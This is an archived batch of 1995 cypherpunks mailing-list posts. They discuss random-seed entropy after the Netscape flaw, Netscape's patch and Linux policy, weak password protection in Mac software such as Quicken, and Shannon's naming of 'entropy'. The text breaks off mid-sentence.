From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 23 Sep 95 17:30:41 PDT
To: wb8foz@nrk.com
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <199509240029.RAA22318@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:29 PM 9/23/95 -0400, you wrote:
>Can you take the time between two effectively async events, and use the
>low order bits of same?
>For example, time between a netverk pack arriving and the next tick of
>the TOD clock? And/or the system's disk IO or such? 

You might get some entropy there, but you can get more (though perhaps not
measurably more) by using the values of both instead.  For instance
        rand = MD5(rand, lowbits(T(clock) - T(packet)))
vs      rand = MD5(rand, T(clock), T(packet))

As long as you're not overoptimistic about how many real bits you've gotten,
might as well actually use the version that keeps more low-quality bits
than try to improve them.  Also, do watch out for things that aren't
really asynchronous, e.g. the next clock tick will probably happen at
some even multiple of 1000000/Hz microseconds.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 23 Sep 95 15:42:33 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <9509221532.AA19315@cantina.verity.com>
Message-ID: <199509232229.SAA00612@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


As a hardware type, I'd prefer a diode noise generator over a
radioactivity detector. I'd hate for the Fort to be tempted to fudge the
latter's output by flooding my house from a black helicopter...

But lacking same....

Can you take the time between two effectively async events, and use the
low order bits of same?

For example, time between a netverk pack arriving and the next tick of
the TOD clock? And/or the system's disk IO or such? 

Or: Choose a site at random. Ping it. Use low order bits of that time
with something above.

I'm sure most such schemes are not usable. But all it takes is one...

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 23 Sep 95 16:01:07 PDT
To: cypherpunks@toad.com
Subject: Need Pathfinder "Cypherpunks" password
Message-ID: <199509232259.SAA12058@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

What is the Cypherpunks password to be used with Pathfinder, Time-Warner's
web site?

TIA,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGSROioZzwIn1bdtAQHi2AGAi18zy9bn/EvI65yoyqAPcQonmp3gaB7y
Di2Jqq0KLUZFR4fzvwxoM4ZVWNfafQ7r
=wBeD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Paquin <paquin@netscape.com>
Date: Sat, 23 Sep 95 19:09:40 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <43tmht$qfe@tera.mcom.com>
Message-ID: <3064BDFB.717F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


> And the sad part is that now that they have announced that they are
> dropping their unofficial Linux support, 

I have no current plans to alter our treatment of Linux.  It is not now,
nor has it ever been, a supported platform.  We do build for it,
and some people are happy about that.

I have not constructed a business case which would cause Netscape
to begin support for Linux versions of the Navigator.  Right now, I'm 
not sure that making a point of this would do what you want.

Either of the two above paragraphs could be changed with time.

--
Tom Paquin                 +1(415)528-2607      fax +1(415)528-4122
Netscape Communications    501 E Middlefield    Mt View, CA 94043 USA



PS. I think that you are all doing a really great job!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Money & Investing Update <WSJ-ANNOUNCE@LIME.EASE.LSOFT.COM>
Date: Sat, 23 Sep 95 16:39:16 PDT
To: Multiple recipients of list WSJ-ANNOUNCE             <WSJ-ANNOUNCE@PEACH.EASE.LSOFT.COM>
Subject: Important Announcement from Money & Investing Update
Message-ID: <9509232338.AA15228@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The Wall Street Journal's Money & Investing Update (http://update.wsj.com)
has now introduced Company Briefing Books, a major product enhancement that
enables Update readers to get a rich, up-to-the-minute background report on
any company in the news.

Briefing Books are highly graphical compilations of recent news, stock
charts, and financial data, available on more than 6,500 U.S. and
international companies. They include news from The Wall Street Journal and
Dow Jones newswires, as well as background reports and performance data from
other leading information sources.

Money & Investing Update editors now include direct hyperlinks to Briefing
Books from nearly every significant mention of a company in Update stories
and tables. In addition, readers can ask for a Briefing Book on a company of
their choosing at any time simply by entering a company name or stock symbol.

The Money & Investing Update is at http://update.wsj.com. If you haven't
read the Update in a while, please try this important new feature. You can
go directly to a Briefing Book request form at this URL:
http://update.wsj.com/briefingbook/inap/search.html.

Best wishes,
The Editors and Staff of Money & Investing Update

----------------------
For further information,  contact us at info@update.wsj.com or call customer
support at 1-800-369-2834.

If you would prefer not to receive any future email from the Money &
Investing Update please send email to "LISTSERV@PEACH.EASE.LSOFT.COM"
In the body of your message please type "UNSUBSCRIBE WSJ-ANNOUNCE"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sat, 23 Sep 95 13:44:23 PDT
To: cypherpunks@toad.com
Subject: Re: HEY!!! WAS: The Next Hack
In-Reply-To: <199509231217.FAA27504@usr1.primenet.com>
Message-ID: <441rhh$bpi@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509231217.FAA27504@usr1.primenet.com>, carolann@censored.org (Censored Girls Anonymous) writes:
> You HAD stated a patch would be available by Friday.
> Now we are at early next week.

  This is what our press release said:

	An updated version of Netscape Navigator 1.1 for Mac OS
	and Unix and Netscape Navigator 1.2 for Windows 3.1 and
	Windows 95 will be available for downloading by existing
	customers on the Internet next week.

There is still a link to it on our home page.
All press accounts I've seen (this is not exhaustive!!) have also
said early next week.

  I don't have an archive of every message I've sent to this list,
so I can't check myself, but if I somehow led you to believe that the
fix would be out friday, then I apologize.  You can look at this
url for the official company statement:

	http://home.netscape.com/newsref/std/random_seed_security.html

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sat, 23 Sep 95 13:57:18 PDT
To: cypherpunks@toad.com
Subject: Re: The Next Hack
In-Reply-To: <4407p5$on4@tera.mcom.com>
Message-ID: <441s9c$for@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509231919.MAA01818@infinity.c2.org>, sameer@c2.org (sameer) writes:
> > 
> >   What exactly is the point of this?  We have:
> 
> 	Is Netscape going to cover the cost of getting the new keys
> that the servers generate signed and certified by Versign? Is netscape
> going to tell its customers that they need to regenerate their
> keys and get new certificates?

  I'm not sure what exactly you mean by "cover the cost".  Our server
customers WILL NOT have to pay verisign for new certificates.  We will
tell all of our customers to generate new keys and get new certificates
ASAP.  We are putting the version number in new certificate requests
so that verisign can reject requests from people who don't have the
new version of the key generator.

  Server operators will also be able to set up their servers to detect
unpatched clients and redirect them to a page that will allow them
to download the patch.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 23 Sep 95 21:38:27 PDT
To: "Christopher J. Shaulis" <cjs@netcom.com>
Subject: Re: Netscape for Linux?
Message-ID: <199509240436.VAA28304@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 PM 9/23/95 -0400, you wrote:
>It seems to me that you folks are going out of your way to deny the
>fact that the Linux market exists. I think that its because you are
>embarassed that all these people with a $20 operating system are
>throwing money at you while all the folks with $10K operating systems
>aren't talking to you at all. 
>
>While you may WANT to have all your sales be for OSF/1 machines or
>solaris, but refusing to support Linux and ignoring the demand for
>your products by the Linux community just because you don't think it
>would sound as impressive, is actually quite childish and doesn't make
>any financial sense.

Foo.  Supporting applications in a professional way on Linux is _tough_;
everybody's got their own self-hacked copy that may have started out as
SlackOS 4.1.3 but has the TooManyNotes Sound Widget replacement and has the 
XBrokenX video driver instead of the original one that didn't work
on the TiltedSquareSneakyVideoCard and a way-cool new Obfuscated File System.
It's like supporting things on "Unix" was back when everybody had source and
a different flavor of M680x0 box.  You can't just ask "Have you changed the
AUTOEXEC.BAT since the machine came from the factory?" like Windoze app-vendors.
Netscape may not have ever been _compiled_ with the compiler version the
user has,
much less tested on that kernel version, and the user may or may not know
if their X Window System really is installed right or the TCP/IP connection 
works well and has working DNS support.

Sure, it's easy to charge money for shipping the stuff with a diskette and
a manual, but not doing so until they're ready to provide high-quality support
isn't childishness, it's ethics (well, and/or bad-reputation-avoidance.)
Now, I haven't checked whether they've trained all their people who answer
phone calls from the public to acknowledge that there is an unsupported
Linux version
for folks who don't mind dealing with unsupported software, or if they've
even got it on their Web site; the current version is there for ftp.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sat, 23 Sep 95 20:50:08 PDT
To: paquin@netscape.com (Tom Paquin)
Subject: Re: Netscape for Linux?
In-Reply-To: <3064BDFB.717F@netscape.com>
Message-ID: <199509240243.WAA00266@hoopsnake.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > And the sad part is that now that they have announced that they are
> > dropping their unofficial Linux support, 
> 
> I have no current plans to alter our treatment of Linux.  It is not now,
> nor has it ever been, a supported platform.  We do build for it,
> and some people are happy about that.
>
> I have not constructed a business case which would cause Netscape
> to begin support for Linux versions of the Navigator.  Right now, I'm 
> not sure that making a point of this would do what you want.

I'll say some people are happy about it. 

You just recently turned down an order for 230 copies of the netscape
navigator for Linux, and as you folks aren't making any money, you can
only wonder why.

You have also turned numerous other attempts by varionus people to buy
both quantities of navigaors and server software for Linux.

It seems to me that you folks are going out of your way to deny the
fact that the Linux market exists. I think that its because you are
embarassed that all these people with a $20 operating system are
throwing money at you while all the folks with $10K operating systems
aren't talking to you at all. 

While you may WANT to have all your sales be for OSF/1 machines or
solaris, but refusing to support Linux and ignoring the demand for
your products by the Linux community just because you don't think it
would sound as impressive, is actually quite childish and doesn't make
any financial sense.

Christopher



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hshubs@BIX.com
Date: Sat, 23 Sep 95 20:08:29 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Lite
Message-ID: <9509232307.memo.6018@BIX.com>
MIME-Version: 1.0
Content-Type: text/plain


Would the person who does this, or someone who can point me at him, contact
me via e-mail please?  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Sat, 23 Sep 95 20:30:36 PDT
To: hshubs@BIX.com
Subject: Re: Cypherpunks Lite
In-Reply-To: <9509232307.memo.6018@BIX.com>
Message-ID: <Pine.SUN.3.91.950923232509.15559A-100000@dorsai.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 23 Sep 1995 hshubs@BIX.com wrote:

> Would the person who does this, or someone who can point me at him, contact
> me via e-mail please?  

I don't run the actual Cypherpunks Lite list, however I do run a free 
filtering service of the same sort... basically stick to news and 
technical stuff, as well as other miscalenous interesting stuff, but don't 
forward whole threads, or flames, etc...

If you want in, let me know in email and I'll add you to the list.


==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sun, 24 Sep 95 00:04:03 PDT
To: cypherpunks@toad.com
Subject: Apology to Netscape.
Message-ID: <199509240703.AAA20745@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jeff Weintstein corrected me with:

>  This is what our press release said:
>
>	An updated version of Netscape Navigator 1.1 for Mac OS
>	and Unix and Netscape Navigator 1.2 for Windows 3.1 and
>	Windows 95 will be available for downloading by existing
>	customers on the Internet next week.

My apologies for the misquote.
 
It only then makes the trading facts worse.

Love Always,

Carol Anne
ps On the asides kind of things, do you realize the Netscape stock 
   base of 5,000,000  shares is not a big sharebase? Coca-Cola's is
   1,300,000,000. And by standards, your stock is really unstable.
   If Coca-Cola moves 3 points there'll be a trading halt, for the
   buying/selling imbalance will be too much. Even if only for 1 min.
   The trading halt gets the good or bad news onto "The Street".
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGUCaYrpjEWs1wBlAQF9ZAP6AkMCsveSU/E8KFDi84urnAR2KlXT42rS
l+9tHh33ZWbM6VmHUMkqelM11vc7zU1eWLhXlYHaoOqwGuTef9irQigbnr+HwYKL
Px9480/Chm59RWCG6j4pp4d0xUQO9Pj0lbpIecn72eDYReRIgh5+MU0jOCNdUNLe
RvP7XvYI570=
=Nb9y
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eyes@amazon.com
Date: Sun, 24 Sep 1995 04:12:23 -0700
To: adam@lighthouse.homeport.org
Subject: Amazon.com Books -- personal notification service
Message-ID: <199509241112.EAA03484@ernie.amazon.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, as per your request, we at Amazon.com Books are notifying you of
new books matching the following criteria:
 
      subjects include "Cryptography"
 
The new books are listed at the end of this message.  If you're
interested in any of these books you can order them online at
http://www.amazon.com/
 
     Your most humble automated search agent,
 
          Eyes
          Amazon.com Books
          http://www.amazon.com/
 
P.S.  Please don't forget that Amazon.com Books has over one million
titles for you to choose from, many discounted 10 to 40 percent off
the list price.  If you have any online friends who might enjoy
Amazon.com Books, we'd really appreciate you spreading the word!
Thank you!
 
------------------------------------------------------------------------
"Advances in Cryptology--Eurocrypt-94 : Workshop on the Theory and 
 Application of Cryptographic Techniques, Perugia, Italy, May 1994 : 
 Proceedings)"

by

Alfredo De Santis

List Price: currently unknown

Subjects: Computer security, Cryptography

Publisher: 
Binding: Hardcover
Expected publication date: September 1995
ISBN: 3540601767

------------------------------------------------------------------------
"Enigma : A Novel"

by

Robert Harris, David Rosenthal(Editor)

List: $23.00 -- Amazon.com Price: $20.70 -- You Save: $2.30 (10%)

Subjects: World War, 1939-1945, Secret service, Great Britain, 
          Fiction, Cryptography

Publisher: Random House
Binding: Hardcover
Expected publication date: October 1995
ISBN: 0679428879

------------------------------------------------------------------------
"Pass It On! : All About Notes, from Secret Codes and Special Inks to 
 Fancy Folds and Dead Man's Drops"

by

Sharon Bailly, Anne Canevari Green(Illustrator)

List: $18.90 -- Amazon.com Price: $18.90

Subjects: Cryptography, Juvenile literature, Writing

Publisher: Millbrook Pr
Binding: Library Binding
Expected publication date: September 1995
ISBN: 1562945882

----- End of forwarded message from eyes@amazon.com -----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Sun, 24 Sep 95 15:45:41 PDT
To: cypherpunks@toad.com
Subject: Lynx (or approx for Windows)?
Message-ID: <m0swznj-00062nC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 24 Sep 95 at 18:10, SysAdmin wrote:


> Screw 'em. If they want to be the defacto standard for *some* OS's
> but not all, someone else will come along and fill in the gap.
> Besides, they already made the point that they don't want to make
> money so why change the status quo. All the more reason to show the
> weaknesses of the product before others get sucked in. I'll stick to
> TkWWW and Lynx thank you.

Sounds odd, but would there be something like Lynx available for
Windows, preferably with forms features fixed. I don't browse for
the pretty pictures and turning the graphics off in Nutscrape doesn't
speed it up much. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Sun, 24 Sep 95 10:19:57 PDT
To: cypherpunks@toad.com
Subject: Found on usenet: ACLU -- "Big Brother and the power of the Net"
Message-ID: <v01530500ac8b4bdecd46@[199.171.88.78]>
MIME-Version: 1.0
Content-Type: text/plain


                    The Midpeninsula Chapter of
        American Civil Liberties Union of Northern California
            presents a free program, open to the public

Speaker:  Jim Warren, MicroTimes correspondent, originator of the West
          Coast Computer Faire, PBS Computer Chronicles and numerous
          other enterprises

Topic:    Big Brother and the power of the Net

Time:     Tuesday, October 17, 1995 at 8:00 pm

Place:    Mandarin Classic Restaurant; First & Main Streets, Los Altos

There is no fee and no reservation is required for those coming just
for the program, but this is the annual meeting of the Midpeninsula
Chapter and is preceded by a reception and dinner that are open to the
public, but for which a reservation is required (see below).

        6:00 pm Reception and no-host bar
        7:00 pm Dinner
        8:00 pm Jim Warren speaks

-------------------------------------------------------------------------

                            Dinner Reservation
                Please return by Friday, October 6, 1995

Dinner reservation for ____ person(s)

Check for $ _____ ($25 per person) is enclosed.  Please make check payable
to ACLU Mid-peninsula.

Mail to:  Iris Barrie                   If you have questions, call:
          4250 El Camino, D-138         Iris Barrie at 415-856-0193
          Palo Alto, CA  94306

--
Les Earnest (les@cs.stanford.edu)               Phone:  415 941-3984
Computer Science Dept.; Stanford, CA 94305        Fax:  415 941-3934

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sun, 24 Sep 95 10:34:20 PDT
To: dmandl@panix.com (David Mandl)
Subject: Re: macworld crypto articles
In-Reply-To: <v01530501ac8b23d65a53@[166.84.250.21]>
Message-ID: <9509241729.AA17667@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave,

> At 3:49 PM 9/23/95, steven ryan wrote:
> >They searched for an applications programmer *UN*skilled at cryptography to
> >try and crack the password protection of the 8 best selling Mac programs.
> >Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours.
> 
> Yup, pretty amazing.  I only skimmed the article, but I believe that out of
> all the programs he tried, there was only one whose crypto he couldn't
> crack.  I found it all a little hard to believe.  I mean, even if they used
> the most obsolete algorithm, wouldn't you have to know _something_ about
> cryptanalysis to crack it?  Are these vendors just putting a "this file is
> locked with this such and such a password" string at the front of the file,
> or what?

I hate to say it, but in the case of Quicken, this is exactly right.

In version 5.0, we've taken measures to protect the online financial
stuff, but there's no serious protection at all on the local data
file.  It's truly a deplorable state of affairs.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Sun, 24 Sep 95 10:50:36 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Netscape for Linux?
In-Reply-To: <199509240436.VAA28304@ix5.ix.netcom.com>
Message-ID: <199509241746.KAA01423@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain



On September 23, Bill Stewart wrote:

> 
> Foo.  Supporting applications in a professional way on Linux is _tough_;
> 
              <Disparaging comments about Linux deleted>

As a Linux user and advocate, I've gotta agree here.  I'm glad that
Netscape is going to continue to supply us with an unsupported binary,
and I can't blame them a bit for not wanting to support an OS where
every user has his own private version number ... would be nice if we
could get 128 bit keys, though ... (hint, hint).

As for your other comments about Linux - would you care to take off your
coat and meet me in Comp.os.flamewars sometime?  ;-)

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sun, 24 Sep 95 08:12:53 PDT
To: steven ryan <sryan@reading.com>
Subject: Re: macworld crypto articles
Message-ID: <v01530501ac8b23d65a53@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:49 PM 9/23/95, steven ryan wrote:
>They searched for an applications programmer *UN*skilled at cryptography to
>try and crack the password protection of the 8 best selling Mac programs.
>Quicken 5.0 was cracked in 5 minutes. Adobe Acrobat in 2 hours.

Yup, pretty amazing.  I only skimmed the article, but I believe that out of
all the programs he tried, there was only one whose crypto he couldn't
crack.  I found it all a little hard to believe.  I mean, even if they used
the most obsolete algorithm, wouldn't you have to know _something_ about
cryptanalysis to crack it?  Are these vendors just putting a "this file is
locked with this such and such a password" string at the front of the file,
or what?

Interesting historical note: In my old APL days (early 80's), IBM used to
lock their VSAPL workspaces with just such a scheme--a "locked bit" at some
fixed position in the file.  But there were enough other reasons not to use
that horrible product...

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 24 Sep 95 09:34:17 PDT
To: cypherpunks@toad.com
Subject: Amazon.com Books -- personal notification service (fwd)
Message-ID: <199509241634.MAA18446@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


	Amazon.com books (which someone mentioned here a few days ago)
has a free personal notification service for new books of interest.
They also claim not to sell your preferences if you so request.

	They have Springer-Verlag conference proceedings, and books by
Hakim Bey.  I spent a while telling them all about whose new books I'd
like to hear about, and this came to me today.

Adam

----- Forwarded message from eyes@amazon.com -----

From owner-cypherpunks  Sun Sep 24 11:12:27 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA26138; Sun, 24 Sep 95 11:12:27 PDT
Received: from dfw.net by toad.com id AA26128; Sun, 24 Sep 95 11:12:25 PDT
Received: by dfw.net (4.1/SMI-4.1)
	id AA15489; Sun, 24 Sep 95 13:10:15 CDT
Date: Sun, 24 Sep 1995 13:10:14 -0500 (CDT)
From: Aleph One <aleph1@dfw.net>
Cc: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <199509241746.KAA01423@goblin.punk.net>
Message-Id: <Pine.SUN.3.90.950924130608.15010A-100000@dfw.net>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-cypherpunks@toad.com
Precedence: bulk

I must agree that supporting something like that client that everyone wants
to use in their on configuration is not an easy thing. But the are many 
ISP using linux as web servers. I for one would buy a few servers my self.
Its a shame netscape does not make an agreement with someone like Red Hat 
(a commercial linux vendor) and supply a server for use with it. Iam sure 
if they can support a server for BSDI (therefor FreeBSD and NetBSD) they 
can support one for Red Hat (and there for Linux). But this does not 
belong in cypherpuns anymore. Nor are the people making this desitions in 
this list anyway.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 


From owner-cypherpunks  Sun Sep 24 19:36:05 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA07105; Sun, 24 Sep 95 19:36:05 PDT
Received: from mail.pilot.net (ns.pilot.net) by toad.com id AA07088; Sun, 24 Sep 95 19:35:40 PDT
Received: from verity.com (unknown-143-5.verity.com [192.187.143.5]) by mail.pilot.net (8.7/8.7.Beta.12) with SMTP id OAA02753; Sun, 24 Sep 1995 14:40:26 -0700 (PDT)
Received: from cantina.verity.com by verity.com (4.1/SMI-4.1_Verity-Main-950202)
	id AA08688; Sun, 24 Sep 95 13:47:42 PDT
Received: by cantina.verity.com (5.x/SMI-SVR4)
	id AA20998; Sun, 24 Sep 1995 13:45:20 -0700
Date: Sun, 24 Sep 1995 13:45:20 -0700
From: patrick@verity.com (Patrick Horgan)
Message-Id: <9509242045.AA20998@cantina.verity.com>
To: cypherpunks@toad.com, rsalz@osf.org
Subject: Re: Defense against a class of programming bugs
Cc: dce-web@osf.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Sun, 24 Sep 95 10:46:20 PDT
To: cypherpunks@toad.com
Subject: Re: macworld crypto articles
In-Reply-To: <4444rl$nrh@life.ai.mit.edu>
Message-ID: <199509241745.NAA20271@toast.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <4444rl$nrh@life.ai.mit.edu> Chen writes:
> It's truly a deplorable state of affairs.

For the next version, include PGP free with every version of Quicken,
and have Quicken just "call" PGP.

Of course, users can encrypt their files now with PGP.  Is there an
Intuit bboard where someone could post instructions?
-- 

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Sun, 24 Sep 95 13:09:19 PDT
To: cypherpunks@toad.com
Subject: Entropy VI: "Shannon's Choice" (with apologies to Wm. Styron)
Message-ID: <JhbZwkkAsOII085yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm always glad to see stuff here about entropy:  it's a topic that
comes up in PGP 101 when locals ask, "How long should my passphrase be?"
and, as we've seen recently, failure to generate adequate entropy for
pseudo-random numbers is often the Achilles' Heel of otherwise solid
cryptosystems.

I found some info about Shannon's choice of the word "entropy" in an
unexpected source lately.  I had some free time this week due to the
surprise snowstorm here, and used it to type in a few paragraphs.
This is intended less for immediate discussion than for the list's
archives, so that I can point folks to it in the future.  And I'm
not going to cite the source, to avoid copyright infringement
nastygrams...if you know who the author is, keep it to yourself:
you'll only suffer public ridicule and loss of "reputation capital"
for Not Watching Enough TV!!! :-)

N.B. -- some of this impresses me as pompous bullshit, and I'm not in
agreement with it.  But the story about von Neumann made it a worthwhile
read, as least to me.
==================================================================

I want now to turn to another juncture in the cascading bifurcations
that mark interpretations of Maxwell's Demon.  The juncture occurs when
Leon Brillouin and Claude Shannon diverge in their opinions about what
the relationship between information and entropy should be.  In Brillouin's
analysis of Maxwell's Demon, the Demon's information allowed him to sort
molecules, thus decreasing the system's entropy; but this information had
to be paid for by an even greater increase in entropy elsewhere in the
system.  For Brillouin, then, information and entropy are opposites and
should have opposite signs.  He emphasized the inverse connection
between information and entropy by coining "negentropy" (from negative
entropy) as a synonym for information.

To Shannon, an engineer at Bell Laboratories who published a two-part
paper that was to form the basis of modern information theory (1948),
information and entropy were not opposites.  They were identical.  When
Shannon devised a probability function that he identified with information,
he chose to call the quantity calculated by the function the "entropy"
of the message.  Why he made this choice is unclear.  Rumor has it that
von Neumann told Shannon to use the word because "no one knows what entropy
is, so in a debate you will always have the advantage."  One could argue
that von Neumann's comment was only one element and that the choice of
"entropy" was overdetermined, with multiple factors leading to its
conflation with "information."  On a conceptual level, an important
consideration was the similarity between Shannon's equation for infor-
mation and Boltzmann's equation for entropy.  Because the two equations
had similar forms, it was tempting to regard the entities they defined
as the same.  On the level of language, entropy was compelling because
it was a term of recognized legitimacy to the concept of information.
On a cultural level, Shannon's choice anticipated the contemporary
insight that proliferating information is associated with the
production of entropy. [...]

Whatever the reasons for Shannon's choice, it is regarded by many
commentators within our scientific tradition as a scandal, for it
led to the (metaphoric) knotting together of concepts that are partly
similar and partly dissimilar.  Typical is K. G. and J. S. Denbigh's
reaction in their careful study of the way the quantity defined by
Shannon's equation differs from thermodynamic entropy.  Recounting the
story about von Neumann's advice, they write that thus, "confusion
entered in and von Neumann had done science a disservice!"  Jeffrey S.
Wicken is even more explicit, calling Shannon's choice "loose language"
that served "the dark god of obfuscation."  "As a result of its
independent lines of development in thermodynamics and information
theory, there are in science today two 'entropies,'" Wicken writes.
"This is one too many.  It is not science's habit to affix the same
name to different concepts.  Shared names suggest shared meanings, and
the connotative field of the old tends inevitably to intrude on the
denotative terrain of the new."

Clearly Wicken's concern is to restore scientific univocality by closing
off the ability of the information-entropy connection to act as a
metaphor rather than a congruence.  Yet at the same time he admits that
shared language creates an inevitable "intrusion" into the "denotative
terrain" of one term by the "connotative field" of another.  The problem
is more scandalous than he recognizes, for whenever a heuristic is
proposed, it necessarily uses "shared names" that cause scientific
denotation to be interpenetrated by cultural connotations.  For what
else is language but "shared names"?  As Wittgenstein has observed,
there are no private languages.  Moreover, the distinction between
denotative and connotative language is itself part of the distinction
between language-as-vehicle and language-as-concept which metaphors,
and particularly self-reflexive metaphors, bring into question.  To
